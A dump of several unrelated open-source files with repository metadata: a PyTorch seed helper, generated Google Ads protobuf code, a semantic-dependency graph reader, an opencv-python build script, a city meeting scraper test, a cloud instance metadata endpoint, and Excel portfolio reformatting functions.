null
null
# Copyright 2018 PIQuIL - All Rights Reserved # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import warnings import torch from .__version__ import __version__ def _warn_on_missing_gpu(gpu): if gpu and not torch.cuda.is_available(): warnings.warn("Could not find GPU: will continue with CPU.", ResourceWarning) def set_random_seed(seed, cpu=True, gpu=False, quiet=False): if gpu and torch.cuda.is_available(): if not quiet: warnings.warn( "GPU random seeds are not completely deterministic. " "Proceed with caution." ) torch.cuda.manual_seed(seed) if cpu: torch.manual_seed(seed)
32.386364
85
0.720702
c99b7e55483bf1fc11e83311bd16ff2e8b99d417
5,545
py
Python
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
arammaliachi/google-ads-python
a4fe89567bd43eb784410523a6306b5d1dd9ee67
[ "Apache-2.0" ]
null
null
null
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
arammaliachi/google-ads-python
a4fe89567bd43eb784410523a6306b5d1dd9ee67
[ "Apache-2.0" ]
null
null
null
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
arammaliachi/google-ads-python
a4fe89567bd43eb784410523a6306b5d1dd9ee67
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: google/ads/googleads/v6/services/gender_view_service.proto """Generated protocol buffer code.""" from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from google.ads.google_ads.v6.proto.resources import gender_view_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2 from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2 from google.api import client_pb2 as google_dot_api_dot_client__pb2 from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2 from google.api import resource_pb2 as google_dot_api_dot_resource__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='google/ads/googleads/v6/services/gender_view_service.proto', package='google.ads.googleads.v6.services', syntax='proto3', serialized_options=b'\n$com.google.ads.googleads.v6.servicesB\026GenderViewServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V6.Services\312\002 Google\\Ads\\GoogleAds\\V6\\Services\352\002$Google::Ads::GoogleAds::V6::Services', create_key=_descriptor._internal_create_key, serialized_pb=b'\n:google/ads/googleads/v6/services/gender_view_service.proto\x12 google.ads.googleads.v6.services\x1a\x33google/ads/googleads/v6/resources/gender_view.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\"Z\n\x14GetGenderViewRequest\x12\x42\n\rresource_name\x18\x01 \x01(\tB+\xe0\x41\x02\xfa\x41%\n#googleads.googleapis.com/GenderView2\x9a\x02\n\x11GenderViewService\x12\xbd\x01\n\rGetGenderView\x12\x36.google.ads.googleads.v6.services.GetGenderViewRequest\x1a-.google.ads.googleads.v6.resources.GenderView\"E\x82\xd3\xe4\x93\x02/\x12-/v6/{resource_name=customers/*/genderViews/*}\xda\x41\rresource_name\x1a\x45\xca\x41\x18googleads.googleapis.com\xd2\x41\'https://www.googleapis.com/auth/adwordsB\xfd\x01\n$com.google.ads.googleads.v6.servicesB\x16GenderViewServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V6.Services\xca\x02 Google\\Ads\\GoogleAds\\V6\\Services\xea\x02$Google::Ads::GoogleAds::V6::Servicesb\x06proto3' , dependencies=[google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,]) _GETGENDERVIEWREQUEST = _descriptor.Descriptor( name='GetGenderViewRequest', full_name='google.ads.googleads.v6.services.GetGenderViewRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='resource_name', full_name='google.ads.googleads.v6.services.GetGenderViewRequest.resource_name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A%\n#googleads.googleapis.com/GenderView', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=264, serialized_end=354, ) DESCRIPTOR.message_types_by_name['GetGenderViewRequest'] = _GETGENDERVIEWREQUEST _sym_db.RegisterFileDescriptor(DESCRIPTOR) GetGenderViewRequest = _reflection.GeneratedProtocolMessageType('GetGenderViewRequest', (_message.Message,), { 'DESCRIPTOR' : _GETGENDERVIEWREQUEST, '__module__' : 'google.ads.googleads.v6.services.gender_view_service_pb2' # @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.GetGenderViewRequest) }) _sym_db.RegisterMessage(GetGenderViewRequest) DESCRIPTOR._options = None _GETGENDERVIEWREQUEST.fields_by_name['resource_name']._options = None _GENDERVIEWSERVICE = _descriptor.ServiceDescriptor( name='GenderViewService', full_name='google.ads.googleads.v6.services.GenderViewService', file=DESCRIPTOR, index=0, serialized_options=b'\312A\030googleads.googleapis.com\322A\'https://www.googleapis.com/auth/adwords', create_key=_descriptor._internal_create_key, serialized_start=357, serialized_end=639, methods=[ _descriptor.MethodDescriptor( name='GetGenderView', full_name='google.ads.googleads.v6.services.GenderViewService.GetGenderView', index=0, containing_service=None, input_type=_GETGENDERVIEWREQUEST, output_type=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2._GENDERVIEW, serialized_options=b'\202\323\344\223\002/\022-/v6/{resource_name=customers/*/genderViews/*}\332A\rresource_name', create_key=_descriptor._internal_create_key, ), ]) _sym_db.RegisterServiceDescriptor(_GENDERVIEWSERVICE) DESCRIPTOR.services_by_name['GenderViewService'] = _GENDERVIEWSERVICE # @@protoc_insertion_point(module_scope)
52.809524
1,120
0.818034
7a701e1a94da219fb124addde8b739c7bbbc65b6
3,392
py
Python
src/sdp_readers.py
gabrielStanovsky/brat-visualizer
b741ea894795f56c46238ec5509d8783f6291a73
[ "MIT" ]
3
2019-07-16T20:44:39.000Z
2022-03-16T16:08:39.000Z
src/sdp_readers.py
gabrielStanovsky/brat-visualizer
b741ea894795f56c46238ec5509d8783f6291a73
[ "MIT" ]
null
null
null
src/sdp_readers.py
gabrielStanovsky/brat-visualizer
b741ea894795f56c46238ec5509d8783f6291a73
[ "MIT" ]
null
null
null
""" Common functions for reading sdp format. """ # External imports import logging import pdb from pprint import pprint from pprint import pformat from docopt import docopt import networkx as nx #import matplotlib.pyplot as plt # Local imports #---- def safe_zip(*lists): """ Zip while making sure all lists are of same length. """ if lists: assert(all([len(lists[0]) == len(ls) for ls in lists[1:]])) return zip(*lists) def get_words_and_preds(sdp_lines): """ Returns the words in the lines, split to columns. and the predicates (subset of words). """ words = [line.strip().split("\t") for line in sdp_lines if (not line.startswith('#')) and \ line.strip()] preds = [word for word in words if word[5] == '+'] return (words, preds) def get_nx_graph(sdp_lines, remove_singletons = False): """ Return a networkx graph representation of the conll input. @param remove_singletons: Indicates whether to remove nodes which aren't connected to any other node. """ graph = nx.MultiDiGraph() words, preds = get_words_and_preds(sdp_lines) total_rels = 0 err_cnt = 0 for line in words: cur_ind = int(line[0]) - 1 graph.add_node(cur_ind, label = "{}_{}".format(cur_ind, line[1]), word = line[1]) rels = line[7:] active_rels = [(rel_ind, rel) for rel_ind, rel in enumerate(rels) if rel != "_"] total_rels += len(active_rels) for pred_ref, rel in active_rels: # populate graph with relations pred_ind = int(preds[pred_ref][0]) - 1 graph.add_edge(pred_ind, cur_ind, label = rel) if remove_singletons: nodes_to_remove = [] for node in graph.nodes(): if not (nx.descendants(graph, node) or nx.ancestors(graph, node)): nodes_to_remove.append(node) for node in nodes_to_remove: graph.remove_node(node) return graph def draw_graph(graph): """ Draw the given graph. """ pos = nx.spring_layout(graph) nx.draw_networkx_nodes(graph, pos, node_color = 'w', linewidths = 0, node_size = 1500, node_shape = 's') nx.draw_networkx_labels(graph, pos, labels = nx.get_node_attributes(graph, 'word')) nx.draw_networkx_edges(graph, pos) nx.draw_networkx_edge_labels(graph, pos, edge_labels = nx.get_edge_attributes(graph, 'label')) plt.show() def get_outgoing_edges(graph, node): """ Get all outgoing edges from a given node in a graph. Includes logic for choosing the ordering of the edges. """ return [(node, neighbor, edge_key) for neighbor, edge_keys in graph[node].iteritems() for edge_key in edge_keys]
28.745763
79
0.519458
a50746665e4bf18b03f55a396d137aa550a61f39
16,344
py
Python
setup.py
GArik/opencv-python
ad0668838a3446ceddecd3ab7f4bb68435e368d0
[ "Apache-2.0", "MIT" ]
null
null
null
setup.py
GArik/opencv-python
ad0668838a3446ceddecd3ab7f4bb68435e368d0
[ "Apache-2.0", "MIT" ]
null
null
null
setup.py
GArik/opencv-python
ad0668838a3446ceddecd3ab7f4bb68435e368d0
[ "Apache-2.0", "MIT" ]
null
null
null
import io import os import os.path import sys import runpy import subprocess import re import sysconfig import platform import skbuild from skbuild import cmaker def main(): os.chdir(os.path.dirname(os.path.abspath(__file__))) CI_BUILD = os.environ.get("CI_BUILD", "False") is_CI_build = True if CI_BUILD == "1" else False cmake_source_dir = "opencv" minimum_supported_numpy = "1.13.3" build_contrib = get_build_env_var_by_name("contrib") build_headless = get_build_env_var_by_name("headless") build_java = "ON" if get_build_env_var_by_name("java") else "OFF" if sys.version_info[:2] >= (3, 6): minimum_supported_numpy = "1.13.3" if sys.version_info[:2] >= (3, 7): minimum_supported_numpy = "1.14.5" if sys.version_info[:2] >= (3, 8): minimum_supported_numpy = "1.17.3" if sys.version_info[:2] >= (3, 9): minimum_supported_numpy = "1.19.3" # arm64 is a special case if sys.version_info[:2] >= (3, 6) and platform.machine() == "aarch64": minimum_supported_numpy = "1.19.3" numpy_version = "numpy>=%s" % minimum_supported_numpy python_version = cmaker.CMaker.get_python_version() python_lib_path = cmaker.CMaker.get_python_library(python_version).replace( "\\", "/" ) python_include_dir = cmaker.CMaker.get_python_include_dir(python_version).replace( "\\", "/" ) if os.path.exists(".git"): import pip._internal.vcs.git as git g = git.Git() # NOTE: pip API's are internal, this has to be refactored g.run_command(["submodule", "sync"]) g.run_command( ["submodule", "update", "--init", "--recursive", cmake_source_dir] ) if build_contrib: g.run_command( ["submodule", "update", "--init", "--recursive", "opencv_contrib"] ) package_version, build_contrib, build_headless = get_and_set_info( build_contrib, build_headless, is_CI_build ) # https://stackoverflow.com/questions/1405913/python-32bit-or-64bit-mode x64 = sys.maxsize > 2 ** 32 package_name = "opencovis-python" if build_contrib and not build_headless: package_name = "opencovis-contrib-python" if build_contrib and build_headless: package_name = "opencovis-contrib-python-headless" if build_headless and not build_contrib: package_name = "opencovis-python-headless" long_description = io.open("README.md", encoding="utf-8").read() packages = ["cv2", "cv2.data"] package_data = { "cv2": ["*%s" % sysconfig.get_config_vars().get("SO"), "version.py"] + (["*.dll"] if os.name == "nt" else []) + ["LICENSE.txt", "LICENSE-3RD-PARTY.txt"], "cv2.data": ["*.xml"], } # Files from CMake output to copy to package. # Path regexes with forward slashes relative to CMake install dir. rearrange_cmake_output_data = { "cv2": ( [r"bin/opencv_videoio_ffmpeg\d{3}%s\.dll" % ("_64" if x64 else "")] if os.name == "nt" else [] ) + # In Windows, in python/X.Y/<arch>/; in Linux, in just python/X.Y/. # Naming conventions vary so widely between versions and OSes # had to give up on checking them. [ "python/cv2[^/]*%(ext)s" % {"ext": re.escape(sysconfig.get_config_var("EXT_SUFFIX"))} ], "cv2.data": [ # OPENCV_OTHER_INSTALL_PATH ("etc" if os.name == "nt" else "share/opencv4") + r"/haarcascades/.*\.xml" ], } # Files in sourcetree outside package dir that should be copied to package. # Raw paths relative to sourcetree root. files_outside_package_dir = {"cv2": ["LICENSE.txt", "LICENSE-3RD-PARTY.txt"]} ci_cmake_generator = ( ["-G", "Visual Studio 14" + (" Win64" if x64 else "")] if os.name == "nt" else ["-G", "Unix Makefiles"] ) cmake_args = ( (ci_cmake_generator if is_CI_build else []) + [ # skbuild inserts PYTHON_* vars. That doesn't satisfy opencv build scripts in case of Py3 "-DPYTHON3_EXECUTABLE=%s" % sys.executable, "-DPYTHON3_INCLUDE_DIR=%s" % python_include_dir, "-DPYTHON3_LIBRARY=%s" % python_lib_path, "-DBUILD_opencv_python3=ON", "-DBUILD_opencv_python2=OFF", # Disable the Java build by default as it is not needed "-DBUILD_opencv_java=%s" % build_java, # When off, adds __init__.py and a few more helper .py's. We use our own helper files with a different structure. "-DOPENCV_SKIP_PYTHON_LOADER=ON", # Relative dir to install the built module to in the build tree. # The default is generated from sysconfig, we'd rather have a constant for simplicity "-DOPENCV_PYTHON3_INSTALL_PATH=python", # Otherwise, opencv scripts would want to install `.pyd' right into site-packages, # and skbuild bails out on seeing that "-DINSTALL_CREATE_DISTRIB=ON", # See opencv/CMakeLists.txt for options and defaults "-DBUILD_opencv_apps=OFF", "-DBUILD_SHARED_LIBS=OFF", "-DBUILD_TESTS=OFF", "-DBUILD_PERF_TESTS=OFF", "-DBUILD_DOCS=OFF", ] + ( ["-DOPENCV_EXTRA_MODULES_PATH=" + os.path.abspath("opencv_contrib/modules")] if build_contrib else [] ) ) if build_headless: # it seems that cocoa cannot be disabled so on macOS the package is not truly headless cmake_args.append("-DWITH_WIN32UI=OFF") cmake_args.append("-DWITH_QT=OFF") cmake_args.append("-DWITH_GTK=OFF") if is_CI_build: cmake_args.append( "-DWITH_MSMF=OFF" ) # see: https://github.com/skvark/opencv-python/issues/263 if sys.platform.startswith("linux") and not x64 and "bdist_wheel" in sys.argv: subprocess.check_call("patch -p0 < patches/patchOpenEXR", shell=True) # OS-specific components during CI builds if is_CI_build: if ( not build_headless and "bdist_wheel" in sys.argv and sys.platform.startswith("linux") ): cmake_args.append("-DWITH_QT=5") subprocess.check_call("patch -p1 < patches/patchQtPlugins", shell=True) if sys.platform.startswith("linux"): rearrange_cmake_output_data["cv2.qt.plugins.platforms"] = [ (r"lib/qt/plugins/platforms/libqxcb\.so") ] # add fonts for Qt5 fonts = [] for file in os.listdir("/usr/share/fonts/dejavu"): if file.endswith(".ttf"): fonts.append( (r"lib/qt/fonts/dejavu/%s\.ttf" % file.split(".")[0]) ) rearrange_cmake_output_data["cv2.qt.fonts"] = fonts if sys.platform == "darwin": rearrange_cmake_output_data["cv2.qt.plugins.platforms"] = [ (r"lib/qt/plugins/platforms/libqcocoa\.dylib") ] if sys.platform.startswith("linux"): cmake_args.append("-DWITH_V4L=ON") cmake_args.append("-DWITH_LAPACK=ON") cmake_args.append("-DENABLE_PRECOMPILED_HEADERS=OFF") # https://github.com/scikit-build/scikit-build/issues/479 if "CMAKE_ARGS" in os.environ: import shlex cmake_args.extend(shlex.split(os.environ["CMAKE_ARGS"])) del shlex # works via side effect RearrangeCMakeOutput( rearrange_cmake_output_data, files_outside_package_dir, package_data.keys() ) skbuild.setup( name=package_name, version=package_version, url="https://github.com/GArik/opencv-python", license="MIT", description="Wrapper package for OpenCV python bindings.", long_description=long_description, long_description_content_type="text/markdown", packages=packages, package_data=package_data, maintainer="Igor Murzov", ext_modules=EmptyListWithLength(), install_requires=numpy_version, python_requires=">=3.6", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Education", "Intended Audience :: Information Technology", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Operating System :: MacOS", "Operating System :: Microsoft :: Windows", "Operating System :: POSIX", "Operating System :: Unix", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: C++", "Programming Language :: Python :: Implementation :: CPython", "Topic :: Scientific/Engineering", "Topic :: Scientific/Engineering :: Image Recognition", "Topic :: Software Development", ], cmake_args=cmake_args, cmake_source_dir=cmake_source_dir, ) class RearrangeCMakeOutput(object): """ Patch SKBuild logic to only take files related to the Python package and construct a file hierarchy that SKBuild expects (see below) """ _setuptools_wrap = None # Have to wrap a function reference, or it's converted # into an instance method on attr assignment import argparse wraps = argparse.Namespace(_classify_installed_files=None) del argparse package_paths_re = None packages = None files_outside_package = None def __init__(self, package_paths_re, files_outside_package, packages): cls = self.__class__ assert not cls.wraps._classify_installed_files, "Singleton object" import skbuild.setuptools_wrap cls._setuptools_wrap = skbuild.setuptools_wrap cls.wraps._classify_installed_files = ( cls._setuptools_wrap._classify_installed_files ) cls._setuptools_wrap._classify_installed_files = ( self._classify_installed_files_override ) cls.package_paths_re = package_paths_re cls.files_outside_package = files_outside_package cls.packages = packages def __del__(self): cls = self.__class__ cls._setuptools_wrap._classify_installed_files = ( cls.wraps._classify_installed_files ) cls.wraps._classify_installed_files = None cls._setuptools_wrap = None def _classify_installed_files_override( self, install_paths, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files, cmake_source_dir, cmake_install_reldir, ): """ From all CMake output, we're only interested in a few files and must place them into CMake install dir according to Python conventions for SKBuild to find them: package\ file subpackage\ etc. """ cls = self.__class__ # 'relpath'/'reldir' = relative to CMAKE_INSTALL_DIR/cmake_install_dir # 'path'/'dir' = relative to sourcetree root cmake_install_dir = os.path.join( cls._setuptools_wrap.CMAKE_INSTALL_DIR(), cmake_install_reldir ) install_relpaths = [ os.path.relpath(p, cmake_install_dir) for p in install_paths ] fslash_install_relpaths = [ p.replace(os.path.sep, "/") for p in install_relpaths ] relpaths_zip = list(zip(fslash_install_relpaths, install_relpaths)) del install_relpaths, fslash_install_relpaths final_install_relpaths = [] print("Copying files from CMake output") for package_name, relpaths_re in cls.package_paths_re.items(): package_dest_reldir = package_name.replace(".", os.path.sep) for relpath_re in relpaths_re: found = False r = re.compile(relpath_re + "$") for fslash_relpath, relpath in relpaths_zip: m = r.match(fslash_relpath) if not m: continue found = True new_install_relpath = os.path.join( package_dest_reldir, os.path.basename(relpath) ) cls._setuptools_wrap._copy_file( os.path.join(cmake_install_dir, relpath), os.path.join(cmake_install_dir, new_install_relpath), hide_listing=False, ) final_install_relpaths.append(new_install_relpath) del m, fslash_relpath, new_install_relpath else: if not found: raise Exception("Not found: '%s'" % relpath_re) del r, found del relpaths_zip print("Copying files from non-default sourcetree locations") for package_name, paths in cls.files_outside_package.items(): package_dest_reldir = package_name.replace(".", os.path.sep) for path in paths: new_install_relpath = os.path.join( package_dest_reldir, # Don't yet have a need to copy # to subdirectories of package dir os.path.basename(path), ) cls._setuptools_wrap._copy_file( path, os.path.join(cmake_install_dir, new_install_relpath), hide_listing=False, ) final_install_relpaths.append(new_install_relpath) final_install_paths = [ os.path.join(cmake_install_dir, p) for p in final_install_relpaths ] return (cls.wraps._classify_installed_files)( final_install_paths, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files, # To get around a check that prepends source dir to paths and breaks package detection code. cmake_source_dir="", cmake_install_dir=cmake_install_reldir, ) def get_and_set_info(contrib, headless, ci_build): # cv2/version.py should be generated by running find_version.py version = {} here = os.path.abspath(os.path.dirname(__file__)) version_file = os.path.join(here, "cv2", "version.py") # generate a fresh version.py always when Git repository exists # (in sdists the version.py file already exists) if os.path.exists(".git"): old_args = sys.argv.copy() sys.argv = ["", str(contrib), str(headless), str(ci_build)] runpy.run_path("find_version.py", run_name="__main__") sys.argv = old_args with open(version_file) as fp: exec(fp.read(), version) return version["opencv_version"], version["contrib"], version["headless"] def get_build_env_var_by_name(flag_name): flag_set = False try: flag_set = bool(int(os.getenv("ENABLE_" + flag_name.upper(), None))) except Exception: pass if not flag_set: try: flag_set = bool(int(open(flag_name + ".enabled").read(1))) except Exception: pass return flag_set # This creates a list which is empty but returns a length of 1. # Should make the wheel a binary distribution and platlib compliant. class EmptyListWithLength(list): def __len__(self): return 1 if __name__ == "__main__": main()
35.68559
125
0.596427
ec576e197844f7c2320e2b6563d77fd1569e417b
2,298
py
Python
tests/test_chi_ssa_1.py
zarifmahmud/city-scrapers
52d6056001c8ea5e100dd686c52947836d63aff9
[ "MIT" ]
null
null
null
tests/test_chi_ssa_1.py
zarifmahmud/city-scrapers
52d6056001c8ea5e100dd686c52947836d63aff9
[ "MIT" ]
null
null
null
tests/test_chi_ssa_1.py
zarifmahmud/city-scrapers
52d6056001c8ea5e100dd686c52947836d63aff9
[ "MIT" ]
null
null
null
from datetime import date, time import pytest from freezegun import freeze_time from tests.utils import file_response from city_scrapers.constants import COMMISSION, CONFIRMED, PASSED, TENTATIVE from city_scrapers.spiders.chi_ssa_1 import ChiSsa1Spider test_response = file_response('files/chi_ssa_1.html') spider = ChiSsa1Spider() freezer = freeze_time('2018-10-12 12:00:00') freezer.start() parsed_items = [item for item in spider.parse(test_response) if isinstance(item, dict)] freezer.stop() def test_start(): assert parsed_items[0]['start'] == {'date': date(2018, 1, 16), 'time': time(14, 0), 'note': ''} def test_id(): assert parsed_items[0]['id'] == ('chi_ssa_1/201801161400/x/state_street_commission') def test_status(): assert parsed_items[0]['status'] == PASSED assert parsed_items[5]['status'] == CONFIRMED assert parsed_items[-1]['status'] == TENTATIVE def test_documents(): assert parsed_items[0]['documents'] == [{ 'url': 'https://loopchicago.com/assets/State-Street-Commission-Meeting-Minutes/da3d4977e1/2018-january-16-ssc-meeting-minutes.pdf', # noqa 'note': 'Minutes', }] assert parsed_items[-1]['documents'] == [] @pytest.mark.parametrize('item', parsed_items) def test_name(item): assert item['name'] == 'State Street Commission' @pytest.mark.parametrize('item', parsed_items) def test_description(item): assert item['event_description'] == '' @pytest.mark.parametrize('item', parsed_items) def test_end(item): assert item['end']['date'] == item['start']['date'] assert item['end']['time'] is None @pytest.mark.parametrize('item', parsed_items) def test_all_day(item): assert item['all_day'] is False @pytest.mark.parametrize('item', parsed_items) def test_location(item): assert item['location'] == { 'address': '190 N State St Chicago, IL 60601', 'name': 'ABC 7 Chicago', 'neighborhood': '', } @pytest.mark.parametrize('item', parsed_items) def test_classification(item): assert item['classification'] == COMMISSION @pytest.mark.parametrize('item', parsed_items) def test_sources(item): assert len(item['sources']) == 1 @pytest.mark.parametrize('item', parsed_items) def test__type(item): assert item['_type'] == 'event'
26.413793
144
0.695387
8fcde5aa01b53c0a475451d3b45264a00c1c9f47
1,332
py
Python
deli_menu/http/mounts/root/routes/metadata.py
sandwichcloud/deli-menu
ca7a3a88b71188124dc174e810c17e8b19a320b4
[ "MIT" ]
null
null
null
deli_menu/http/mounts/root/routes/metadata.py
sandwichcloud/deli-menu
ca7a3a88b71188124dc174e810c17e8b19a320b4
[ "MIT" ]
null
null
null
deli_menu/http/mounts/root/routes/metadata.py
sandwichcloud/deli-menu
ca7a3a88b71188124dc174e810c17e8b19a320b4
[ "MIT" ]
null
null
null
import cherrypy from ingredients_db.models.instance import Instance from ingredients_db.models.region import Region from ingredients_db.models.zones import Zone from ingredients_http.route import Route from ingredients_http.router import Router class MetaDataRouter(Router): def __init__(self): super().__init__(uri_base='meta-data') @Route() @cherrypy.tools.json_out() def get(self): with cherrypy.request.db_session() as session: instance = session.query(Instance).filter(Instance.id == cherrypy.request.instance_id).first() region = session.query(Region).filter(Region.id == instance.region_id).first() zone = session.query(Zone).filter(Zone.id == instance.zone_id).first() keypairs = [] for keypair in instance.keypairs: keypairs.append(keypair.public_key) # Strip out user-data tags = instance.tags if instance.tags is not None else {} if 'user-data' in tags: del tags['user-data'] metadata = { 'ami-id': instance.image_id, 'instance-id': instance.id, 'region': region.name, 'availability-zone': zone.name, 'tags': tags, 'public-keys': keypairs } return metadata
32.487805
106
0.623874
d4f109f265a9ef80d103ea28f7cb435d0da19e52
220
py
Python
mirumon/main.py
mirumon/mirumon-backend
9b4d914b67dcc839ed8264f470e822dc22c98ad7
[ "MIT" ]
19
2020-01-25T22:52:09.000Z
2022-03-20T13:45:10.000Z
mirumon/main.py
mirumon/mirumon-backend
9b4d914b67dcc839ed8264f470e822dc22c98ad7
[ "MIT" ]
15
2019-10-07T18:18:40.000Z
2020-10-17T15:47:39.000Z
mirumon/main.py
mirumon/mirumon-backend
9b4d914b67dcc839ed8264f470e822dc22c98ad7
[ "MIT" ]
1
2020-01-20T14:16:29.000Z
2020-01-20T14:16:29.000Z
import uvicorn from mirumon.api.asgi import create_app from mirumon.settings.config import get_app_settings settings = get_app_settings() app = create_app(settings) if __name__ == "__main__": uvicorn.run(app=app)
20
52
0.786364
a5430cf8e3823cb1bf637dca2a204efd8777c749
5,568
py
Python
modifiers.py
mglac/S2C-excel-modifier-for-trading
03237c14cf60c715a43607cb53f33314674524d1
[ "MIT" ]
null
null
null
modifiers.py
mglac/S2C-excel-modifier-for-trading
03237c14cf60c715a43607cb53f33314674524d1
[ "MIT" ]
null
null
null
modifiers.py
mglac/S2C-excel-modifier-for-trading
03237c14cf60c715a43607cb53f33314674524d1
[ "MIT" ]
null
null
null
# modifiers.py - This class contains the methods used to alter the portfolio # spreadsheets to the desired format for trading assets. import os from openpyxl import styles from openpyxl import load_workbook from openpyxl import Workbook from tkinter import filedialog from tkinter import Text # excel_modifications Method # This method takes the file path to the workbook being read along with the # file path to the location the user wants the new workbooks to be stored at. def excel_modifications(file_path, storage_path): init_wb = load_workbook(file_path, data_only=True) # loads workbook for ws in init_wb: if ws.title == "CORE": # checks if the current worksheet is the CORE worksheet core_compression(ws, storage_path) if ws.title == "Infl": # checks if the current worksheet is the Infl worksheet infl_compression(ws, storage_path) if ws.title == "FI" or ws.sheet_properties.tabColor.theme == 9: # checks if the current worksheet is the FI worksheet or if the # current worksheet's tab number is colored green common_compression(ws, storage_path) # common_compression method # This method is used to modify any portfolio worksheet along with the Fixed # Income worksheet. This is done to prepare the worksheet for trading. def common_compression(worksheet, storage_path): new_wb = Workbook() # creates a new workbook to write to new_ws = new_wb.active # opens to the active worksheet in the new workbook new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title new_ws_ticker_list = [] # a list of tickers new_ws_percent_list = [] # a list of percents corresponding to tickers for row in worksheet.values: # Iterates through all of the rows in the ws curr_percent = row[0] curr_ticker = row[1] if isinstance(curr_percent, float) and isinstance(curr_ticker, str): new_ws_ticker_list.append(str(curr_ticker)) new_ws_percent_list.append(curr_percent) for i in range(len(new_ws_ticker_list) + 1): if i == 0: # Titles the column as Security new_ws.cell(1, 1).value = 'Security' new_ws.cell(1, 2).value = '%' # Titles the column as % else: new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1] new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1] new_ws.cell(i+1, 1).number_format = '0.000%' new_ws.cell(i+1, 2).number_format = '0.000%' # Saves in specified file location new_wb.save(storage_path + "\\" + str(new_ws.title)) # core_compression method # This method is used to modify the Core Stocks worksheet. This is done to # prepare the worksheet for trading. def core_compression(worksheet, storage_path): new_wb = Workbook() # creates a new workbook to write to new_ws = new_wb.active # opens to the active worksheet in the new workbook new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title new_ws_ticker_list = [] # a list of tickers new_ws_percent_list = [] # a list of percents corresponding to tickers for row in worksheet.values: # Iterates through all of the rows in the ws curr_percent = row[3] curr_ticker = row[0] if isinstance(curr_percent, float) and isinstance(curr_ticker, str): new_ws_ticker_list.append(str(curr_ticker)) new_ws_percent_list.append(curr_percent) for i in range(len(new_ws_ticker_list) + 1): if i == 0: # Titles the column as Security new_ws.cell(1, 1).value = 'Security' new_ws.cell(1, 2).value = '%' # Titles the column as % else: new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1] new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1] new_ws.cell(i+1, 1).number_format = '0.000%' new_ws.cell(i+1, 2).number_format = '0.000%' # Saves in specified file location new_wb.save(storage_path + "\\" + str(new_ws.title)) # infl_compression method # This method is used to modify the Inflation Model worksheet. This is done to # prepare the worksheet for trading. def infl_compression(worksheet, storage_path): new_wb = Workbook() # creates a new workbook to write to new_ws = new_wb.active # opens to the active worksheet in the new workbook new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title new_ws_ticker_list = [] # a list of tickers new_ws_percent_list = [] # a list of percents corresponding to tickers for row in worksheet.values: # Iterates through all of the rows in the ws curr_percent = row[2] curr_ticker = row[0] if isinstance(curr_percent, float) and isinstance(curr_ticker, str): new_ws_ticker_list.append(str(curr_ticker)) new_ws_percent_list.append(curr_percent) for i in range(len(new_ws_ticker_list) + 1): if i == 0: # Titles the column as Security new_ws.cell(1, 1).value = 'Security' new_ws.cell(1, 2).value = '%' # Titles the column as % else: new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1] new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1] new_ws.cell(i+1, 1).number_format = '0.000%' new_ws.cell(i+1, 2).number_format = '0.000%' # Saves in specified file location new_wb.save(storage_path + "\\" + str(new_ws.title))
45.639344
79
